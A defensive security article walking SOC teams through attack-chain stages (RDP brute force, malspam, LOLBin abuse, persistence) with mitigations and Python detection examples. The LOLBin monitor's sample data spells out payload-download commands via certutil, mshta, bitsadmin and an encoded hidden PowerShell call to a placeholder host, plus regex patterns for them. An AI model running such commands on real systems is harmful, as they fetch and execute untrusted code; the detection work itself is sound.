SOC First Defense Phase – Understanding The Cyber Attack Chain – A Defense Approach with/without SOC

Network security teams, small-scale industries, and smaller firms that cannot run a SOC can follow these actions to build a basic defense wall.

Breaking the attack chain and stopping the criminals before they reach their goal lowers the business impact of data loss. This article does not provide complete defense steps or a full blue-team guide for your organization.

It gives brief details on the attack vectors, and every SOC team needs to build a defense for them as a preliminary stage of security monitoring.

This post will help you understand modern cyber threats and the attack surfaces most commonly used behind malware and cyber-attacks. Most of the time, cyber attacks are executed in stages. The SOC team must understand the attack patterns and the attack chain.


Three major facts you need to keep in mind:

Cybercriminals always plan ahead of security controls.

1.) Do not hand everything to the attacker easily; make it harder to obtain. (Control measures in the network)
2.) Do not allow legitimate but vulnerable applications if they are not in use; attackers constantly use legitimate applications already in the network. (Abuse of LOLBins)
3.) Do not assume attackers create only a single piece of code; they always rely on attack stages with more functionality and commands. (Cyber Kill Chains)

Modern cyber attacks are not a single stage; they deliver malware to companies in stages of infection. The attacker tempts the victim to click a URL that looks harmless, which redirects to a C&C server and drops the payloads. These stages cannot be blocked by traditional defenses alone.

RDP – Remote Desktop Protocol (Port 3389). Identifying servers with exposed RDP (port 3389 is the default) has been made extremely simple by scanning tools like Shodan and masscan.

From there, it is simply a matter of using brute-forcing tools like NLBrute to crack the RDP account credentials, and the attackers are in. Alternatively, if attackers are feeling especially lazy, they can simply head over to the underground market xDedic, where RDP access to a compromised server can cost as little as $6.

Fig: This is not the Cyber Kill Chain; it is a basic stage of attack.

Block unauthorized and unwanted e-mail attachment extensions. Gmail blocks these extensions, and they can be blocked in your organization too.

If malware delivery succeeds, how are you going to defend against its lateral movement and persistence? If the attacker completes all his activities, his final stage will be exfiltration or breach: data leaving your organization's network.

The defense mechanisms you have to build depend on your environment.

In current variants, e-mail is the most feasible option for cyber attackers to lure the victim into clicking malicious links with appealing words or images. In some scenarios, the e-mail is the 1st stage, enticing the victim to run scripts from the e-mail, which abuse the user's applications and download payloads for the 2nd stage of infection. Disabling or restricting those legitimate resources from downloading files from the Internet can help prevent payload retrieval.

Two major methods:

1.) Email Delivery – MalSpam, Spear phishing, Email Campaigns
2.) RDP Entry Points

Let's break down the stages and see the defense response for each, to ensure protection against common infection vectors.

Defense Response to RDP Abuse:

– Restrict access via firewalls
– Use strong passwords and 2FA/MFA
– Limit the users who can log in using RDP
– Set an account lockout policy to counter brute-force attacks
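The lockout policy above only fires when one account is hit repeatedly; an attacker who tries a few passwords against many accounts stays under the threshold. The following is an added example (not the article's own code) of the monitoring logic a SOC would run over Windows Security Event 4625 (failed logon) records to catch both cases. The event records are constructed sample data; logon type 10 is RDP (RemoteInteractive) and the 5-failures-in-30-minutes default is an assumed lockout policy.

```python
"""Brute-force and password-spray detection over Windows Security Event 4625
(failed logon) records for RDP. Added example; the records below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4625 records: (time, source IP, target user, logon type).
# Logon type 10 = RemoteInteractive (RDP); type 3 = network logon (not RDP).
SAMPLE_EVENTS = [
    ("2024-01-10 09:00:01", "203.0.113.7", "administrator", 10),
    ("2024-01-10 09:00:03", "203.0.113.7", "administrator", 10),
    ("2024-01-10 09:00:05", "203.0.113.7", "administrator", 10),
    ("2024-01-10 09:00:06", "203.0.113.7", "administrator", 10),
    ("2024-01-10 09:00:08", "203.0.113.7", "administrator", 10),
    ("2024-01-10 09:00:09", "203.0.113.7", "administrator", 10),
    ("2024-01-10 09:10:00", "198.51.100.9", "alice", 10),
    ("2024-01-10 09:11:00", "198.51.100.9", "bob", 10),
    ("2024-01-10 09:12:00", "198.51.100.9", "carol", 10),
    ("2024-01-10 09:13:00", "198.51.100.9", "dave", 10),
    ("2024-01-10 09:14:00", "198.51.100.9", "erin", 10),
    ("2024-01-10 09:20:00", "10.0.0.5", "alice", 10),   # single typo, benign
    ("2024-01-10 09:21:00", "10.0.0.6", "bob", 3),      # not an RDP logon
]


def parse(events):
    """Turn the raw tuples into (datetime, ip, lower-cased user, logon type)."""
    return [(datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), ip, user.lower(), lt)
            for t, ip, user, lt in events]


def detect_rdp_abuse(events, threshold=5, window=timedelta(minutes=30), spray_users=4):
    """Return alerts of two kinds.

    ('bruteforce', ip, user): one source fails against the same account at least
        `threshold` times within `window`, i.e. what the lockout policy would trip on.
    ('spray', ip, n_users): one source fails against `spray_users` or more distinct
        accounts while staying below `threshold` on each, which a lockout policy
        alone never catches.
    """
    by_src = defaultdict(list)
    for ts, ip, user, lt in parse(events):
        if lt == 10:                        # only RDP (RemoteInteractive) failures
            by_src[ip].append((ts, user))

    alerts = []
    for ip, attempts in by_src.items():
        attempts.sort()
        per_user = defaultdict(list)
        for ts, user in attempts:
            per_user[user].append(ts)

        # Sliding window per account: count failures inside `window`.
        for user, times in per_user.items():
            start = 0
            for end in range(len(times)):
                while times[end] - times[start] > window:
                    start += 1
                if end - start + 1 >= threshold:
                    alerts.append(("bruteforce", ip, user))
                    break

        # Spray: many accounts, each below the lockout threshold.
        low = [u for u, t in per_user.items() if len(t) < threshold]
        if len(low) >= spray_users:
            alerts.append(("spray", ip, len(low)))
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_abuse(SAMPLE_EVENTS):
        print(alert)
```

Feed it the 4625 events exported from your SIEM in the same shape; the two thresholds should match the lockout policy you actually set so the 'bruteforce' alert confirms the policy tripped, while the 'spray' alert covers what the policy misses.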

Cyber attackers love to abuse legitimate Microsoft Office applications to achieve their objectives, because:

1.) Office applications are widely accepted. Many of the attachment names attackers use in e-mail reflect this (Invoice, Spreadsheet, Reports, Balance Sheets, Documents, Tenders).
2.) Office apps are simple to weaponize. Attackers are drawn to Microsoft's built-in capabilities and use them in many ways.

Stage 1A: Retrieval of payloads from Command & Control servers.

Stage 1: Delivery of Malware/MalSpam.

For every e-mail, firewalls/IPS and organization gateways play an important role in preventing malware delivery to your organization. However, in recent times these defenses are easily defeated by cyber attackers.

A.) Commonly used e-mail attachments in most e-mail campaigns.

B.) Restrict employees from running scripts at the endpoint level.
C.) User awareness of spam e-mails and sufficient training.
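The attachment-extension blocking recommended above is easy to state and easy to get wrong (double extensions, upper-case names, archives that carry the same scripts inside). The following is an added example, not the article's code, of how such a gateway filter classifies attachment names. The block list is a constructed subset modelled on the kind of list Gmail publishes; use your gateway vendor's maintained list in production.

```python
"""Attachment-name filter of the kind the article recommends at the mail
gateway. Added example; BLOCKED and ARCHIVES are constructed lists."""

# Constructed subset of extensions commonly blocked at mail gateways
# (not Gmail's current list; take the maintained list from your vendor).
BLOCKED = {
    "exe", "com", "scr", "pif", "bat", "cmd", "msi", "msp", "mst",
    "js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "ps1", "jar",
    "lnk", "chm", "cpl", "dll", "iso", "img", "reg", "sct",
}
# Archives are not blocked outright here but flagged for content inspection,
# since the same scripts commonly arrive inside them.
ARCHIVES = {"zip", "rar", "7z", "gz", "cab"}


def extensions_of(filename: str) -> list:
    """Return every extension in the dotted chain, lower-cased.
    'Invoice.pdf.exe' -> ['pdf', 'exe'], so double extensions are visible."""
    name = filename.strip().lower()
    parts = name.split(".")
    return [p.strip() for p in parts[1:] if p.strip()]


def classify_attachment(filename: str) -> tuple:
    """Classify one attachment name as ('block' | 'inspect' | 'allow', reason)."""
    exts = extensions_of(filename)
    if not exts:
        return "inspect", "no extension"
    last = exts[-1]
    if last in BLOCKED:
        return "block", f"blocked extension .{last}"
    # A blocked extension earlier in the chain (report.exe.txt) is unusual
    # enough to deserve a look even though the final extension is harmless.
    hidden = [e for e in exts[:-1] if e in BLOCKED]
    if hidden:
        return "inspect", f"executable extension hidden in name (.{hidden[0]})"
    if last in ARCHIVES:
        return "inspect", f"archive .{last} needs content inspection"
    return "allow", f".{last} not on block list"


def filter_message(attachments: list) -> dict:
    """Group a message's attachment names by verdict."""
    out = {"block": [], "inspect": [], "allow": []}
    for name in attachments:
        verdict, _ = classify_attachment(name)
        out[verdict].append(name)
    return out


if __name__ == "__main__":
    # Constructed attachment names typical of the campaigns the article lists.
    for name in ["Invoice.pdf.exe", "Balance Sheet.xlsx", "Tender.JS ", "scan.zip"]:
        print(name.strip(), "->", classify_attachment(name))
```

The point of the chain check is that a rule matching only the final extension already catches `Invoice.pdf.exe`; the `inspect` verdicts exist for the cases a plain block list has no opinion on, so an analyst or a sandbox gets to decide instead of the default being "allow".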

RDP has become a favorite infection vector for ransomware criminals in particular, with the actors behind SamSam, CrySiS, LockCrypt, Shade, Apocalypse, and other variants all getting in on the act.

How do attackers abuse Microsoft applications to retrieve payloads?

There are a variety of malicious injection techniques attackers can use: DLL Injection, Reflective DLL Injection, Process Hollowing, Process Doppelgänging, AtomBombing, etc.

Legitimate applications: the following can be used to circumvent application whitelisting. Either blocking them or keeping them under monitoring is recommended.

A.) VBScript and JavaScript – Disable them if not needed.
B.) PowerShell – Disable it or reduce its capabilities using AppLocker or Windows Software Restriction Policy (SRP).
C.) Abuse of certutil.exe, mshta.exe, curl.exe, bitsadmin.exe and regsvr32.exe – Block these applications, and block them from making outgoing requests.
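Where blocking these binaries outright is not possible, the "under monitoring" option above means watching process-creation events (Sysmon Event 1 or Security Event 4688) for the download and script-execution switches they are abused with. The following is an added example, not the article's code, of that detection logic run over constructed process records. The rules mirror widely published detection content for these binaries; `evaluate` and `triage` are names chosen here, and the domains are reserved test names.

```python
"""LOLBin monitoring for the binaries named in the article (certutil, mshta,
regsvr32, bitsadmin, curl, PowerShell, script hosts) over process-creation
records. Added example; records and rule set are constructed."""
import re
from typing import NamedTuple


class Hit(NamedTuple):
    image: str
    rule: str


# (lower-cased image name, regex over the command line, rule name).
# Tune for your environment, e.g. allow-list your patch/deployment servers.
RULES = [
    ("certutil.exe", re.compile(r"-urlcache|-decode|-encode|-verifyctl", re.I),
     "certutil download/decode"),
    ("mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I),
     "mshta remote/inline script"),
    ("regsvr32.exe", re.compile(r"/i:https?://|scrobj\.dll", re.I),
     "regsvr32 scriptlet"),
    ("bitsadmin.exe", re.compile(r"/transfer|/addfile|/setnotifycmdline", re.I),
     "bitsadmin transfer"),
    ("curl.exe", re.compile(r"https?://", re.I), "curl outbound fetch"),
    ("powershell.exe", re.compile(
        r"-e(nc|ncodedcommand|c)?\b|downloadstring|downloadfile|\biex\b|"
        r"invoke-expression|-nop\b|-w(indowstyle)?\s+hidden", re.I),
     "powershell download/obfuscation"),
    ("wscript.exe", re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I), "script host"),
    ("cscript.exe", re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I), "script host"),
]
MONITORED = {name for name, _, _ in RULES}
# Office processes spawning any of the above is the Stage 1A pattern itself.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed process-creation records (image, command line, parent image).
SAMPLE_RECORDS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://files.example.invalid/a.txt a.txt",
     "parent": WINWORD},
    {"image": r"C:\Windows\System32\certutil.exe",          # benign use
     "cmdline": "certutil -verify cert.cer", "parent": EXPLORER},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://files.example.invalid/x.hta", "parent": EXPLORER},
    {"image": r"C:\Windows\System32\regsvr32.exe",          # benign install
     "cmdline": "regsvr32 /s C:\\Program Files\\Vendor\\lib.dll",
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job http://files.example.invalid/p p.exe",
     "parent": EXPLORER},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc <base64-placeholder>",
     "parent": WINWORD},
    {"image": r"C:\Windows\System32\cscript.exe",           # admin script: monitor
     "cmdline": "cscript //nologo inventory.vbs", "parent": EXPLORER},
]


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(record: dict) -> list:
    """Return the Hits one process-creation record triggers."""
    img = image_name(record["image"])
    hits = [Hit(img, rule) for name, rx, rule in RULES
            if img == name and rx.search(record["cmdline"])]
    parent = image_name(record.get("parent", ""))
    if parent in OFFICE_PARENTS and img in MONITORED:
        hits.append(Hit(img, f"spawned by Office process {parent}"))
    return hits


def triage(records: list) -> list:
    """(command line, [rule names]) for every record that triggered something."""
    out = []
    for rec in records:
        hits = evaluate(rec)
        if hits:
            out.append((rec["cmdline"], [h.rule for h in hits]))
    return out


if __name__ == "__main__":
    for cmdline, rules in triage(SAMPLE_RECORDS):
        print(rules, "<-", cmdline)
```

Note that the two benign records (a certificate verification and an MSI-driven `regsvr32 /s` of a local DLL) produce no hits, while the Office-parent rule fires independently of the command-line rules, so a record can carry two reasons; that is deliberate, since the parent relationship is the higher-confidence signal.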

Not just Microsoft Office applications: attackers also use other legitimate applications and Windows built-in tools to retrieve payloads.

Stage 2: Ensure the malware is not executed and does not spread across the organization.

Defenses against malware execution in your environment are:

Attacks have evolved to bypass/evade AV. To be effective, endpoint security software should make use of machine learning for smarter file analysis, and of real-time system activity analysis designed to detect and block malicious behavior.


Traditionally, organizations have relied on anti-virus (AV) software to prevent malware from running.

Exploiting Equation Editor – CVE-2017-11882 – functionality removed in the January 2018 Windows Security Update.

Application whitelisting is another good layer but can be challenging to maintain. Attackers can also bypass whitelisting and AV by injecting malicious code into authorized processes.

Attackers can also bypass whitelisting and many AV/NGAV solutions by injecting malicious code into the memory space of a legitimate process, thus hijacking its privileges and executing under its guise.

1.) Endpoint protection.
2.) Application whitelisting.
3.) Disable or restrict users from running scripts.
4.) If possible, Windows Controlled Folder Access.
5.) To prevent injection techniques, monitor processes and API calls.

Stage 3: Ensure your data is not exfiltrated or breached at/after the last stage of the attack chain.

Once attackers have initial access, their attention turns to post-exploitation activities. To keep operating under the radar, attackers prefer "living off the land," using legitimate tools and processes already present on the system. One of the first objectives of post-exploitation is usually privilege escalation, the process of gaining additional rights and access in order to achieve persistence.

Living off the land is the technique of abusing legitimate programs and built-in functionality to perform malicious activities without raising alarms. Some of the most commonly abused tools are PowerShell, Windows Management Instrumentation (WMI), and remote administration tools like PsExec.

Attacker Techniques and Defense Mechanisms:

A growing number of malware variants are designed to propagate automatically, typically by abusing remote administration tools.

Attackers can abuse system tools and functionality to create various load points, including saving scripts in the registry.

1.) Abusing programs designed to auto-elevate
  a.) Use the highest UAC enforcement level whenever possible.
  b.) Enable Admin Approval Mode.
  c.) Remove users from the local admin group.
2.) DLL hijacking
  a.) Endpoint security software.
  b.) Disallow loading of remote DLLs.
  c.) Enable Safe DLL Search Mode.
3.) Privilege escalation exploits (token stealing, exploiting NULL pointer dereference vulnerabilities, setting security descriptors to NULL, etc.)
  a.) Endpoint security software with user-space, kernel-space, and CPU-level visibility.
4.) Dumping credentials
  a.) Disable credential caching.
  b.) Disable or restrict PowerShell with AppLocker.
  c.) Practice least privilege; avoid credential overlap.
  d.) Endpoint protection software that protects LSASS and other credential stores.
5.) Lateral movement techniques (abusing remote administration tools, etc.)
  a.) UAC settings recommendations.
  b.) Network segmentation best practices (ref: SANS).
  c.) Two-factor authentication (2FA).
6.) Hiding malicious scripts in the registry
  a.) Monitor with Autoruns.
7.) Creating malicious scheduled tasks
  a.) Monitor for Windows Security Log Event ID 4698.
8.) Abusing WMI to trigger script execution based on events (at startup, etc.)
  a.) Create defensive WMI event subscriptions.
  b.) When possible, set a fixed port for remote WMI and block it.


This is all about gaining a fundamental understanding of the threat vectors and attack surfaces we may encounter in our organization, and building a defense wall at a fundamental level.

This will not make you 100% safe against all threats; more unique techniques keep emerging, and more correlation of malware patterns is in development. We should ensure that we are already safe against the known patterns of cyber attacks, based on the above recommendations.

Remember, "When defenders learn, attackers evolve".
